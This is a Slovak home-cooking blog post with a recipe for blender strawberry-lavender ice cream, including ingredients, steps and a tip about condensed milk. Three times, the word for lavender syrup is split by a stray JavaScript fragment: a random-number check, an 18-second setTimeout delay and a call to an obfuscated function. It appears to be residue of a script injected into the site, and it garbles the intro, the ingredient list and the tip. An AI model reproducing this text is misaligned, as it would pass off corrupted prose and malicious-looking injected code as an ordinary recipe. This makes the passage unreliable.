Jahodovo-levanduľová zmrzlina

Ten pocit, keď vám dieťa oznámi, že by si dalo zmrzlinku a vy dúfate, že v chladničke nájdete šľahačkovú smotanu 😀 Jahody v mrazáku mám celoročne, pretože každý rok chodím na samozber a urobím si zásoby…snáď budú tento rok sladšie, ako tie minuloročné..Výrobu levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľového sirupu nájdete tu na mojej stránke v histórii receptov, tak smelo do toho, keď začne kvitnúť.

Ingrediencie

  • 2 veľké hrste mrazených jahôd
  • 1 kl mletej sušenej vanilky
  • 1 čl levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľového sirupu
  • Javorový sirup, alebo med na osladenie podľa chuti
  • 1 šľahačkovú smotanu (môžete aj tú na varenie, ak chcete menej tuku)

Postup

OLYMPUS DIGITAL CAMERA

  1. Všetko spolu vložíme naraz do výkonného mixéra, v ktorom sa dá drtiť ľad. Tento, čo mám ja od elektroluxu ma špeciálny program na drtenie ľadu. Drtíme a mixujeme, kým nám nevznikne hladká zmrzlina. Pár krát som ho musela otvoriť a premiešať, aby sa všetky jahody dostali pod nože, ale išlo to raz dva 🙂 Samozrejme, lyžičku strkáme do mixéra, keď nie je pod prúdom!
  2. Ihneď servírujeme a to, čo nám zvýši, vložíme do uzatvárateľnej misky a do chladničky a vyberáme podľa potreby.

OLYMPUS DIGITAL CAMERA

Verím, že som vám týmto receptom priniesla trošíííčku leta do kuchyne a vaše detičky určite ocenia maminku, ktorá vie vyrobiť takú fajnúúú zmrzku! Lebo: „kto nemnel zmrzku, neví, co je láska“!

OLYMPUS DIGITAL CAMERA

TIP: Ak máte radi salko (ja ho MILUJEM!!!), môžete namiesto sladidla pridať salko. A to ešte len budete očami gúľať, keď to ochutnáte. Vtedy ale odporúčam vynechať levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľový sirup.

 

Ohodnoť Recept

Napíš Koment